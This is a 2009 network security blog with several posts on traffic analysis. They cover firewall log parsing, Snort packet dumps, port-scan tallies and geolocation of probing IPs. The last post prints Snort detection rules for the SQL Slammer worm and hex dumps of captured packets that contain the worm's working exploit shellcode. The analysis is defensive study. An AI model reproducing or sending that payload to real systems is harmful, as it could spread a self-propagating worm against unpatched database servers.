Sunday, May 31, 2009

The National Cyber Security Effort

Inside the last three months, I have restarted my network security business: RMF Network Security (www.rmfnetworksecurity.com). I have been in research mode and I am still in some type of stealth mode, as I think about the implications of restarting a consulting business in the ever dangerous and now crime-ridden world of network security. The last time I did this, I didn't do enough "product development" and research in advance of my marketing efforts.  

However, the last year of network security 'awareness' may change my need to do extensive marketing. Our President has just announced the results of the sixty day Cyber Security Review. More than 100 source papers were consulted. See my initial analysis below. I started this obscure blog with the idea that I could use the motivation of internet publishing to gauge my re-education and business progress. Inside the first month, I have had the same extensive (web interest) in my blog from American military, military-industrial complex, telecom, educational institutions that I had with my Powershell Blog (also network centric),  but this time with lots of added hits now from Russia, China, ex-Eastern bloc and Brazil IP addresses. Interestingly, 'researchers' are mostly finding their way to my blog by googling IP addresses from my script dumps!

Apparently, my visitors are either expressing interest in the same Source Internet Protocol Addresses I am logging (SIPs) simultaneously or (worse case), those SIPs are looking at me while I discuss them.   The network security business has changed since I last participated in developing IDS systems with NAI and Hiverworld. Things are bigger, badder and scarier - more criminal and nation-state oriented simultaneously. Firewalls and IPS software are being pushed beyond their intended capacities and organized crime and nation-state terrorists have become systemized at IPS evasion, spamming, botnets, bot herding,  inserting key stroke loggers, malware, etc. "Cyberwarfare" has a new and significant government interest. Here are some reads I have found lately to prepare myself for changes in the field:

    * "The Shadow Government" (James Bamford)  This book documents the build-out in the cyber capacities of the National Security Agency in the last 8 years. Among other discussions it documents  how the NSA has purchased industrial strengthcontext searching software from select software companies to analyze traffic from top network access points across all U.S. telecoms.  This apparently is the book that broke the "warrantless wiretapping" scandal a year or so back.
    * "McMafia" Misha Glenny discusses in detail recruitment the young and poor as cyber hackers for nation state terrorists and criminal organizations in Russia, Brazil, China, ex-Eastern Bloc nations and elsewhere.  He also discusses world crime and world crime sophistication to date. A downright terrifying read. Apparently, the average computer in the U.S. is seen as a potential botnet member by most of the world's criminal syndicates/hackers.
    * FOIA from Wired Magazine on the FBI's CIPAV spyware : http://www.wired.com/threatlevel/2009/04/get-your-fbi-sp Also a very inetersting read...Criminals use spyware and so does our government...Surprise!

I had some difficultly searching all the 100 assorted papers on line at http://www.whitehouse.gov/cyberreview/documents/ and resorted to mixing Cygwin and cmd.exe shells to do so. I did an initial context search, which admittedly lost papers and data at each command line.  In any event, the papers may prove interesting reading yet, although they appear at first glance more policy oriented than technical.

[from cmd.exe or Cygwin]
lynx -source http://www.whitehouse.gov/cyberreview/documents/ | grep pdf | gawk -F\" '{print $4}' > source.txt
[from cmd.exe]
for /f "delims==" %i in (source.txt) do wget "%i"
[from cmd.exe or Cygwin]
ls -1 *.pdf > source2.txt
[from cmd.exe]
@(for /f "delims==" %i in (source2.txt) do pdftotext -f 1 -l 1500 "%i" pdf.txt && cat pdf.txt >> pdf.all.txt)
[from Cygwin]
for i in `cat file`; do echo `pcregrep -w -i -c $i pdf.all.txt` `echo $i` >> context1.txt;done
[from Cygwin]
$ cat context1.txt | sort -nr
499 Infrastructure
215 Services
194 Financial
53 criminal
52 crime
45 organized
45 loss
41 spam
39 malware
27 losses
24 Firewalls
20 botnets
16 Firewall
15 tax
14 organize
14 crimes
14 China
12 botnet
9 Russia
7 Linux
6 Windows
5 IDS
4 trojans
4 bot
4 IPS
3 bots
2 trojan
2 Israel
2 India
1 IE
1 France
1 Firefox
1 Apple
0 tcpdump
0 syslogd
0 sysklogd
0 spamming
0 keyloggers
0 keylogger
0 key-strokes
0 key-stroke
0 evasion
0 Snort
0 QNX
0 Opera
0 OpenBSD
0 Chrome
0 Bulgaria
0 Brazil
0 BRIC

If you are interested and have the time, let me know if you find my blog approachable, and what interests you think would most drive your businesses and professions to read and think about network security.  I think I am gearing up to producing some white papers tailored to many audience types: business, personal, home user, etc.  The goal is to generate interest for consulting contracts. 

Wednesday, May 27, 2009

Homegrown tcpdump/snort analysis

I have written a script which parses snort and/or tcpdump text files to display significant information for Source and Destination IPs and ports.This script allows for some flexibility in filtering ports and ultimately produces separate files for each query and summary statistics as shown below. Tcptrace does similar work but I thought I would contribute something homegrown before I started looking in depth at existing tcp/IDS trace analysis tools.

## bash or ksh script to sort IP addresses from tcpdump or snort text output
## version 0.1 May 23 2009
## requires one argument: file name consisting of text dump of snort or tcpdump output
## requires pcregrep, awk,nmap services file, geoiplookup

/* rest of script here: http://www.rmfdevelopment.com/UnixShellScripts/LocateIP.sh.txt */

[some sample output:]
......Summary Statistics........
248 unique Source IP/ port pairs
190 unique source addresses
155 unique source ports
125 unique Destination IP/port pairs
6 unique destination addresses
124 unique destination ports
42 Source ports recognized by nmap services file
38 Destination ports recognized by nmap services file
190 Source cities recognized by GeoLiteCity.dat

[some sample files produced]
# ls -1 uniq*
uniqDIP.txt
uniqDIPPorts.txt
uniqDestIPs.txt
uniqIPs.txt
uniqSIP.txt
uniqSIPPorts.txt
uniqSourceIPs.txt

Sunday, May 17, 2009

Host Protection: Working with Microsoft's Firewall

Both network and host protection are recommended. Each OS has native firewall host protection:

OpenBSD: pf
FreeBSD: pfsense
Fedora Cora: iptables with SELinux
Windows XP,2003,2008,Vista,7 : Windows Firewall (ICF)

Microsoft's native firewall on XP SP3 can be told to log all incoming and outgoing packets up to a maximum log size of 32676 bytes(2^15). It will turn over twice before rewriting the old log file name.  A full examination of the Firewall's configuration is beyond the scope of this post.  A regedt32 query of StandardProfiles and DomainProfiles for all Control Sets for all globally open ports and authorized applications is recommended as is a manual exploration of the appropriate regedt32 keys. (Netsh commands are available for all Firewalled Windows. Please see http://support.microsoft.com/kb/947709 . Powershell can also be used to configure Microsoft's Firewall. ):   

regquery HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List | findstr Enabled
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List | findstr Enabled
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List | findstr Enabled
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\GloballyOpenPorts\List | findstr Enabled

reg query HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List | findstr Enabled
reg query HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List | findstr Enabled
reg query HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List | findstr Enabled
reg query HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\GloballyOpenPorts\List | findstr Enabled

A sample partial result would be: 

reg query HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List | findstr Enabled
    139:TCP     REG_SZ  139:TCP:LocalSubNet:Enabled:@xpsp2res.dll,-22004
    445:TCP     REG_SZ  445:TCP:LocalSubNet:Enabled:@xpsp2res.dll,-22005
    137:UDP     REG_SZ  137:UDP:LocalSubNet:Enabled:@xpsp2res.dll,-22001
    138:UDP     REG_SZ  138:UDP:LocalSubNet:Enabled:@xpsp2res.dll,-22002
    53:UDP      REG_SZ  53:UDP:LocalSubNet:Enabled:DNS-UDP
    53:TCP      REG_SZ  53:TCP:LocalSubNet:Enabled:DNS
    500:UDP     REG_SZ  500:UDP:*:Enabled:@xpsp2res.dll,-22017

The pfirewall.log gives a considerable amount of information as such:

more pfirewall.log
#Version: 1.5
#Software: Microsoft Windows Firewall
#Time Format: Local
#Fields: date time action protocol src-ip dst-ip src-port dst-port size tcpflags tcpsyn tcpack tcpwin icmptype icmpcode info path

2009-04-23 10:24:55 DROP UDP 192.168.0.4 192.168.0.255 137 137 96 - - - - - - - RECEIVE
2009-04-23 10:24:56 DROP UDP 192.168.0.4 192.168.0.255 137 137 96 - - - - - - - RECEIVE
2009-04-23 10:24:57 DROP UDP 192.168.0.4 192.168.0.255 137 137 96 - - - - - - - RECEIVE
2009-04-23 10:24:57 DROP UDP 192.168.0.4 192.168.0.255 138 138 202 - - - - - - - RECEIVE
2009-04-23 10:24:57 DROP UDP 192.168.0.4 192.168.0.255 137 137 78 - - - - - - - RECEIVE
2009-04-23 10:24:57 DROP UDP 192.168.0.4 192.168.0.255 137 137 96 - - - - - - - RECEIVE
....

Using Cygwin's Bash client and gawk, a list of src and dst ports can be obtained: 

cat /cygdrive/D/pfirewall.log | awk -F" " '{print $7}' | sort -nr | uniq -c | sort -nr | more
cat /cygdrive/D/pfirewall.log | awk -F" " '{print $8}' | sort -nr | uniq -c | sort -nr | more

Gawk's conditional logic coupled with pcregrep quick searching helps us print the frequency of a destination IP and accompanying port(s) for a specified source IP:

cat /cygdrive/D/pfirewall.log | pcregrep OPEN | awk -F" " '{if ($5=="192.168.0.8") print $6 ":" $8}' | sort -nr | uniq -c | sort -nr | more
  16138 192.168.0.1:53
    902 192.168.0.1:80
    446 74.125.242.24:80
    359 65.214.57.165:80
    304 216.73.87.115:80
    272 85.13.200.108:110
    247 70.32.92.85:80
    240 216.73.87.152:80
    215 75.101.163.8:80
    208 68.142.93.133:80
    203 74.125.127.191:80
    201 128.111.41.37:80
....

Now we choose to sort by the frequency of one specific dst port for each dst IP from the specified (local) source IP:

cat /cygdrive/D/pfirewall.log | pcregrep OPEN | awk -F" " '{if ($5=="192.168.0.8") print $6 ":" $8}' | sort -nr | uniq -c | pcregrep ':443' | sort -nr
    113 74.125.53.147:443
     92 74.125.53.83:443
     78 208.235.248.150:443
     50 208.75.76.32:443
     46 74.125.127.103:443
     30 74.125.53.97:443
     24 74.125.127.120:443
     23 65.55.157.60:443
     22 96.6.248.124:443
     21 74.125.53.99:443
...

For example, I was surprised to find all the foreign addresses that my local computer asked NBNS queries of: 

cat /cygdrive/D/pfirewall.log | pcregrep OPEN | awk -F" " '{if ($5=="192.168.0.8") print $6 ":" $8}' | sort -nr | uniq -c | pcregrep ':137' | sort -nr
  42 192.168.0.4:137
  39 192.168.0.6:137
  36 192.168.0.2:137
  16 192.168.0.9:137
  15 206.51.224.187:137
  14 208.117.252.85:137
  14 192.168.0.1:137
  13 206.72.124.93:137
  11 74.125.103.33:137
  10 64.94.107.20:137
  10 64.236.79.54:137
  10 206.191.161.8:137
...

The dates and times of those queries could be found with: 

cat /cygdrive/D/pfirewall.log | pcregrep OPEN | awk -F" " '{if ($5=="192.168.0.8") print $1 ":" $4 ":" $6 ":" $8}' | pcregrep ':137' | sort -nr | more
2009-05-14:UDP:192.168.0.4:137
2009-05-14:UDP:192.168.0.4:137
2009-05-06:UDP:75.52.124.131:137
2009-05-06:UDP:74.125.103.28:137
2009-05-06:UDP:69.64.6.21:137
2009-05-06:UDP:66.35.45.202:137
2009-05-06:UDP:66.35.45.202:137
2009-05-06:UDP:66.35.45.202:137
2009-05-06:UDP:66.35.45.201:137
2009-05-06:UDP:66.35.45.201:137
2009-05-06:UDP:66.35.45.201:137
2009-05-06:UDP:65.55.52.84:137
2009-05-06:UDP:65.55.52.148:137
2009-05-06:UDP:65.55.185.61:137
2009-05-06:UDP:65.55.185.29:137
2009-05-06:UDP:65.55.184.189:137
2009-05-06:UDP:65.173.218.69:137
2009-05-06:UDP:65.173.218.69:137
2009-05-06:UDP:64.94.107.16:137
2009-05-06:UDP:64.236.115.52:137
2009-05-06:UDP:4.71.104.187:137
....

These two commands are also recommended:

C:\WINDOWS\system32\drivers\etc>net config server
C:\WINDOWS\system32\drivers\etc>net config workstation

Friday, May 15, 2009

Bash 4.0,awk,geoiplookup and pcregrep are fast

Bash 4.0,awk,geoiplookup and pcregrep make a powerfully fast search team.  Here I find out how many sockets pairs are in my Snort dump: 
bash-4.0# snort -qdevX -r May12085154PDT2009.1242143514 | pcregrep TTL | awk -F":" '{print $1}' | wc -l                   
     372 

Then I find out how many uniqe SIPs are in those socket pairs:
bash-4.0# snort -qdevX -r May12085154PDT2009.1242143514 | pcregrep TTL | awk -F":" '{print $1}' | uniq | sort -nr | wc -l
     226 

Then I find my top ten Source IP Addresses:
bash-4.0# snort -qdevX -r May12085154PDT2009.1242143514 | pcregrep TTL | awk -F":" '{print $1}' | sort | uniq -c | sort -nr | head -n 10
  
  62 218.103.62.150
  15 222.215.230.49
  14 221.195.73.68
  11 121.15.245.215
  10 119.161.130.75
   8 209.85.163.126
   8 125.65.165.139
   7 66.35.46.195
   7 209.85.201.125
   6 64.106.128.150
....
Then I determine what source ports my top SIP (foreign address) has initiated connections to:
bash-4.0# snort -qdevX -r May12085154PDT2009.1242143514 | pcregrep 218.103.62.150 | awk -F":" '{print $3}'| awk -F" " '{print $1}' | sort -n | uniq

113
160
1433
1434
2967
5554
6429
7212
12712
16896
17337
17681
17919
18448
18487
18488
18649
18932
19899
33436
38507

Next I find what are the top source ports for my top ten SIPs: 
bash-4.0# for i in `cat temp.txt`; do echo $i && snort -qdevX -r May12085154PDT2009.1242143514 | pcregrep $i | awk -F":" '{print $3}'| awk -F" " '{print $1}' | sort | uniq -c | sort -nr; done

218.103.62.150
   3 6429
   3 5554
   3 38507
   3 33436
   3 2967
   3 19899
   3 18932
   3 18649
   3 18488
   3 18487
   3 18448
   3 17919
   3 17681
   3 17337
   3 16896
   3 160
   3 1434
   3 1433
   3 12712
   3 113
   2 7212
222.215.230.49
   6 7212
   6 3128
   3 8000
221.195.73.68
   7 8000
   7 7212
121.15.245.215
   7 3128
   4 8000
119.161.130.75
  10 2967
209.85.163.126
   8 33137
125.65.165.139
   4 8000
   4 3128
66.35.46.195
   7 33436
209.85.201.125
   3 18205
   3 18184
   1 18077
64.106.128.150
   6 33442

Last, I retrieve those top ten SIP city locations:
bash-4.0# for i in `cat temp.txt`; do echo $i `snort -qdevX -r May12085154PDT2009.1242143514 | geoiplookup $i -f /usr/local/share/GeoIP/GeoLiteCity.dat` ;done

218.103.62.150 GeoIP City Edition, Rev 1: HK, 00, Kowloon, (null), 22.316700, 114.183296, 0, 0
222.215.230.49 GeoIP City Edition, Rev 1: CN, 32, Chengdu, (null), 30.666700, 104.066597, 0, 0
221.195.73.68 GeoIP City Edition, Rev 1: CN, 10, Hebei, (null), 39.889702, 115.275002, 0, 0
121.15.245.215 GeoIP City Edition, Rev 1: CN, 30, Jiangmen, (null), 22.583300, 113.083298, 0, 0
119.161.130.75 GeoIP City Edition, Rev 1: CN, 19, Chaoyang, (null), 41.570301, 120.458603, 0, 0
209.85.163.126 GeoIP City Edition, Rev 1: US, CA, Mountain View, 94043, 37.419201, -122.057404, 807, 650
125.65.165.139 GeoIP City Edition, Rev 1: CN, 32, Chengdu, (null), 30.666700, 104.066597, 0, 0
66.35.46.195 GeoIP City Edition, Rev 1: US, CO, Denver, 80216, 39.785000, -104.941498, 751, 303
209.85.201.125 GeoIP City Edition, Rev 1: US, CA, Mountain View, 94043, 37.419201, -122.057404, 807, 650
64.106.128.150 GeoIP City Edition, Rev 1: US, NJ, Hoboken, 07030, 40.745800, -74.032097, 501, 201

Wednesday, May 13, 2009

Understanding an attack

Snort can be run in daemon mode, with a configuration file that logs on certain alerts only. For demonstration, we can run Snort in 'packet dump' mode (-dev) for a day or so while using BPF filters for our own needs:

/usr/local/bin/snort -devX -i xl0 -L $(date "+%b%e%H%M%S%Z%Y") 'port not(domain or whois or http or https or syslog or ntp or smtp or 137 or 139)' and 'not(broadcast or icmp or igmp or arp)'

After some awkward awk statements and some ditzy KSH work, we have a list of ports others who are seeking our network seem interested in:

snort -vdeX -r May12085154PDT2009.1242143514 | grep TTL: | awk -F"->" '{print $1 ":" $2 ":" $3}' | awk -F":" '{print $4}' | awk -F" " '{print $1}' | sort -nr | uniq -c | sort -nr

14 2967
6 8000
6 5900
6 3128
6 22
5 23
5 1434
5 12712
4 7212
4 4899
4 1433
1 8080
1 7209
1 65535
1 56017
1 3306
1 23803
1 21
1 19756
1 19696
1 1024

snort -vdeX -r May12085154PDT2009.1242143514 | grep TTL: | awk -F"->" '{print $1 ":" $2 ":" $3}' | awk -F":" '{print $4}' | awk -F" " '{print $1}' | sort | uniq | sort -nr >> ports.txt

for i in `cat ports.txt`; do grep -w $i /usr/local/share/nmap/nmap-services;done

http-proxy 8080/tcp # Common HTTP proxy/second web server port
http-alt 8000/tcp # A common alternative http port
vnc 5900/tcp # Virtual Network Computer display
radmin 4899/tcp # Radmin (www.radmin.com) remote PC control software
mysql 3306/tcp # mySQL
squid-http 3128/tcp #
symantec-av 2967/udp # Symantec AntiVirus (rtvscan.exe)
ms-sql-m 1434/tcp # Microsoft-SQL-Monitor
ms-sql-m 1434/udp # Microsoft-SQL-Monitor
ms-sql-s 1433/tcp # Microsoft-SQL-Server
ms-sql-s 1433/udp # Microsoft-SQL-Server
kdm 1024/tcp # K Display Manager (KDE version of xdm)
telnet 23/tcp #
telnet 23/udp #
ssh 22/tcp # Secure Shell Login
ssh 22/udp # Secure Shell Login
ftp 21/tcp # File Transfer [Control]
ftp 21/udp # File Transfer [Control]

Nmap services file helps explain much here, but why the large interest in a Symantec AntiVirus port? It turns out others have noticed this recently as well and are asking for input:

http://isc.sans.org/diary.html?storyid=6319.
http://msmvps.com/blogs/harrywaldron/archive/2006/11/27/new-botnet-impacts-symantec-client-port-2967-on-unpatched-pcs.aspx
http://www.offensivecomputing.net/?q=node/403

Is this a new or mutated trojan? worm? remote exploit? Multiple addresses are interested in connecting to us on this port:

# snort -vdeX -r May12085154PDT2009.1242143514 | grep TTL: | grep 2967 | sort -nr | uniq -c | sort -nr

3 218.75.95.242:6000 -> 192.168.0.12:2967 TCP TTL:105 TOS:0x20 ID:256 IpLen:20 DgmLen:40
2 119.161.130.75:6000 -> 192.168.0.12:2967 TCP TTL:99 TOS:0x20 ID:256 IpLen:20 DgmLen:40
1 61.191.63.8:6000 -> 192.168.0.12:2967 TCP TTL:103 TOS:0x20 ID:256 IpLen:20 DgmLen:40
1 61.145.62.75:6000 -> 192.168.0.12:2967 TCP TTL:107 TOS:0x20 ID:256 IpLen:20 DgmLen:40
1 60.173.12.60:6000 -> 192.168.0.12:2967 TCP TTL:106 TOS:0x20 ID:256 IpLen:20 DgmLen:40
1 60.172.229.11:6000 -> 192.168.0.12:2967 TCP TTL:105 TOS:0x20 ID:65419 IpLen:20 DgmLen:40
1 60.172.229.11:6000 -> 192.168.0.12:2967 TCP TTL:105 TOS:0x20 ID:42349 IpLen:20 DgmLen:40
1 222.186.26.93:6000 -> 192.168.0.12:2967 TCP TTL:103 TOS:0x20 ID:256 IpLen:20 DgmLen:40
1 121.140.174.105:6000 -> 192.168.0.12:2967 TCP TTL:107 TOS:0x20 ID:256 IpLen:20 DgmLen:40
1 121.14.156.149:6000 -> 192.168.0.12:2967 TCP TTL:102 TOS:0x20 ID:256 IpLen:20 DgmLen:40
1 121.14.156.148:6000 -> 192.168.0.12:2967 TCP TTL:103 TOS:0x20 ID:256 IpLen:20 DgmLen:40


But the packet looks like a simple connection attempt to a remote port. A buffer overflow in Symantec AntiVirus port?

218.75.95.242:6000 -> 192.168.0.12:2967 TCP TTL:105 TOS:0x20 ID:256 IpLen:20 DgmLen:40
******S* Seq: 0x60B40000 Ack: 0x0 Win: 0x4000 TcpLen: 20
0x0000: 00 60 97 30 6B C4 00 09 5B 00 F3 DA 08 00 45 20 .`.0k...[.....E
0x0010: 00 28 01 00 00 00 69 06 55 BE DA 4B 5F F2 C0 A8 .(....i.U..K_...
0x0020: 00 0C 17 70 0B 97 60 B4 00 00 00 00 00 00 50 02 ...p..`.......P.
0x0030: 40 00 F1 34 00 00 00 00 00 00 00 00 @..4........

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=

05/13-12:59:50.507559 0:9:5B:0:F3:DA -> 0:60:97:30:6B:C4 type:0x800 len:0x3C
121.140.174.105:6000 -> 192.168.0.12:2967 TCP TTL:107 TOS:0x20 ID:256 IpLen:20 DgmLen:40
******S* Seq: 0x4260000 Ack: 0x0 Win: 0x4000 TcpLen: 20
0x0000: 00 60 97 30 6B C4 00 09 5B 00 F3 DA 08 00 45 20 .`.0k...[.....E
0x0010: 00 28 01 00 00 00 6B 06 66 06 79 8C AE 69 C0 A8 .(....k.f.y..i..
0x0020: 00 0C 17 70 0B 97 04 26 00 00 00 00 00 00 50 02 ...p...&......P.
0x0030: 40 00 60 0B 00 00 00 00 00 00 00 00 @.`.........

Tuesday, May 12, 2009

A Brief Anatomy of Malware detection and some notes on using traceroute and determining 'intent'

From the posts below we can begin to understand why signature identification is so important.  We are looking for malware in the packet data itself since any port can be used to send malware and any IP can be spoofed or unwittingly part of a botnet or worm.  The packets below are indicative of the "Win32:SQLSlammer"  worm attack that has been around for a considerable time. The worm propagates itself by generating random IP addresses. Notice that the first SIP (Source IP) address is either spoofed or "router leakage" : e.g. it comes from RFC1918 "private" (non-internet IPs) subnet: 10.255.255.255. Remember that any of these IP addresses can be either (a) spoofed or (b) botnet victims or (c) unpatched SQL servers so that their ultimate location may not neccessarily tells us anything about 'intent' or 'bad actors'. Note the common signature in these 376 byte packets. The "Win32:SQLSlammer" reeked an extraordinary amount of havoc upon the internet with a very small amount of assembly code. The current Snort rules for this worm look like this:

alert udp $EXTERNAL_NET any -> $HOME_NET 1434 (msg:"SQL Worm propagation attempt"; flow:to_server; content:"|04|"; depth:1; content:"|81 F1 03 01 04 9B 81 F1 01|"; content:"sock"; content:"send"; metadata:policy balanced-ips drop, policy security-ips drop; reference:bugtraq,5310; reference:bugtraq,5311; reference:cve,2002-0649; reference:nessus,11214; reference:url,vil.nai.com/vil/content/v_99992.htm; classtype:misc-attack; sid:2003; rev:12;)


alert udp $HOME_NET any -> $EXTERNAL_NET 1434 (msg:"SQL Worm propagation attempt OUTBOUND"; flow:to_server; content:"|04|"; depth:1; content:"|81 F1 03 01 04 9B 81 F1|"; content:"sock"; content:"send"; metadata:policy balanced-ips drop, policy security-ips drop; reference:bugtraq,5310; reference:bugtraq,5311; reference:cve,2002-0649; reference:nessus,11214; reference:url,vil.nai.com/vil/content/v_99992.htm; classtype:misc-attack; sid:2004; rev:11;)


The packets I captured are below. Note the common ASCII signature

05/11-14:33:07.744419 0:9:5B:0:F3:DA -> 0:60:97:30:6B:C4 type:0x800 len:0x1A2
10.13.3.61:1092 -> 192.168.0.12:1434 UDP TTL:113 TOS:0x20 ID:61068 IpLen:20 DgmLen:404
Len: 376
0x0000: 00 60 97 30 6B C4 00 09 5B 00 F3 DA 08 00 45 20  .`.0k...[.....E 
0x0010: 01 94 EE 8C 00 00 71 11 8B AE 0A 0D 03 3D C0 A8  ......q......=..
0x0020: 00 0C 04 44 05 9A 01 80 63 09 04 01 01 01 01 01  ...D....c.......
0x0030: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
0x0040: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
0x0050: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
0x0060: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
0x0070: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
0x0080: 01 01 01 01 01 01 01 01 01 01 01 DC C9 B0 42 EB  ..............B.
0x0090: 0E 01 01 01 01 01 01 01 70 AE 42 01 70 AE 42 90  ........p.B.p.B.
0x00A0: 90 90 90 90 90 90 90 68 DC C9 B0 42 B8 01 01 01  .......h...B....
0x00B0: 01 31 C9 B1 18 50 E2 FD 35 01 01 01 05 50 89 E5  .1...P..5....P..
0x00C0: 51 68 2E 64 6C 6C 68 65 6C 33 32 68 6B 65 72 6E  
0x00D0: 51 68 6F 75 6E 74 68 69 63 6B 43 68 47 65 74 54  QhounthickChGetT
0x00E0: 66 B9 6C 6C 51 68 33 32 2E 64 68 77 73 32 5F 66  f.llQh32.dhws2_f
0x00F0: B9 65 74 51 68 73 6F 63 6B 66 B9 74 6F 51 68 73  .etQhsockf.toQhs
0x0100: 65 6E 64 BE 18 10 AE 42 8D 45 D4 50 FF 16 50 8D  end....B.E.P..P.
0x0110: 45 E0 50 8D 45 F0 50 FF 16 50 BE 10 10 AE 42 8B  E.P.E.P..P....B.
0x0120: 1E 8B 03 3D 55 8B EC 51 74 05 BE 1C 10 AE 42 FF  ...=U..Qt.....B.
0x0130: 16 FF D0 31 C9 51 51 50 81 F1 03 01 04 9B 81 F1  ...1.QQP........
0x0140: 01 01 01 01 51 8D 45 CC 50 8B 45 C0 50 FF 16 6A  ....Q.E.P.E.P..j
0x0150: 11 6A 02 6A 02 FF D0 50 8D 45 C4 50 8B 45 C0 50  .j.j...P.E.P.E.P
0x0160: FF 16 89 C6 09 DB 81 F3 3C 61 D9 FF 8B 45 B4 8D  ........
0x0170: 0C 40 8D 14 88 C1 E2 04 01 C2 C1 E2 08 29 C2 8D  .@...........)..
0x0180: 04 90 01 D8 89 45 B4 6A 10 8D 45 B0 50 31 C9 51  .....E.j..E.P1.Q
0x0190: 66 81 F1 78 01 51 8D 45 03 50 8B 45 AC 50 FF D6  f..x.Q.E.P.E.P..
0x01A0: EB CA                                            ..

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

05/11-14:53:48.630387 0:9:5B:0:F3:DA -> 0:60:97:30:6B:C4 type:0x800 len:0x1A2
202.99.11.99:1231 -> 192.168.0.12:1434 UDP TTL:110 TOS:0x80 ID:26925 IpLen:20 DgmLen:404
Len: 376
0x0000: 00 60 97 30 6B C4 00 09 5B 00 F3 DA 08 00 45 80  .`.0k...[.....E.
0x0010: 01 94 69 2D 00 00 6E 11 4B 31 CA 63 0B 63 C0 A8  ..i-..n.K1.c.c..
0x0020: 00 0C 04 CF 05 9A 01 80 9A 01 04 01 01 01 01 01  ................
0x0030: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
0x0040: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
0x0050: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
0x0060: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
0x0070: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
0x0080: 01 01 01 01 01 01 01 01 01 01 01 DC C9 B0 42 EB  ..............B.
0x0090: 0E 01 01 01 01 01 01 01 70 AE 42 01 70 AE 42 90  ........p.B.p.B.
0x00A0: 90 90 90 90 90 90 90 68 DC C9 B0 42 B8 01 01 01  .......h...B....
0x00B0: 01 31 C9 B1 18 50 E2 FD 35 01 01 01 05 50 89 E5  .1...P..5....P..
0x00C0: 51 68 2E 64 6C 6C 68 65 6C 33 32 68 6B 65 72 6E  Qh.dllhel32hkern
0x00D0: 51 68 6F 75 6E 74 68 69 63 6B 43 68 47 65 74 54  QhounthickChGetT
0x00E0: 66 B9 6C 6C 51 68 33 32 2E 64 68 77 73 32 5F 66  f.llQh32.dhws2_f
0x00F0: B9 65 74 51 68 73 6F 63 6B 66 B9 74 6F 51 68 73  .etQhsockf.toQhs
0x0100: 65 6E 64 BE 18 10 AE 42 8D 45 D4 50 FF 16 50 8D  end....B.E.P..P.
0x0110: 45 E0 50 8D 45 F0 50 FF 16 50 BE 10 10 AE 42 8B  E.P.E.P..P....B.
0x0120: 1E 8B 03 3D 55 8B EC 51 74 05 BE 1C 10 AE 42 FF  ...=U..Qt.....B.
0x0130: 16 FF D0 31 C9 51 51 50 81 F1 03 01 04 9B 81 F1  ...1.QQP........
0x0140: 01 01 01 01 51 8D 45 CC 50 8B 45 C0 50 FF 16 6A  ....Q.E.P.E.P..j
0x0150: 11 6A 02 6A 02 FF D0 50 8D 45 C4 50 8B 45 C0 50  .j.j...P.E.P.E.P
0x0160: FF 16 89 C6 09 DB 81 F3 3C 61 D9 FF 8B 45 B4 8D  ........
0x0170: 0C 40 8D 14 88 C1 E2 04 01 C2 C1 E2 08 29 C2 8D  .@...........)..
0x0180: 04 90 01 D8 89 45 B4 6A 10 8D 45 B0 50 31 C9 51  .....E.j..E.P1.Q
0x0190: 66 81 F1 78 01 51 8D 45 03 50 8B 45 AC 50 FF D6  f..x.Q.E.P.E.P..
0x01A0: EB CA  

ñ05/11-19:12:48.180440 0:9:5B:0:F3:DA -> 0:60:97:30:6B:C4 type:0x800 len:0x1A2
58.20.222.30:1297 -> 192.168.0.12:1434 UDP TTL:114 TOS:0x20 ID:9759 IpLen:20 DgmLen:404
Len: 376
0x0000: 00 60 97 30 6B C4 00 09 5B 00 F3 DA 08 00 45 20  .`.0k...[.....E 
0x0010: 01 94 26 1F 00 00 72 11 48 33 3A 14 DE 1E C0 A8  ..&...r.H3:.....
0x0020: 00 0C 05 11 05 9A 01 80 57 53 04 01 01 01 01 01  ........WS......
0x0030: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
0x0040: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
0x0050: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
0x0060: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
0x0070: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
0x0080: 01 01 01 01 01 01 01 01 01 01 01 DC C9 B0 42 EB  ..............B.
0x0090: 0E 01 01 01 01 01 01 01 70 AE 42 01 70 AE 42 90  ........p.B.p.B.
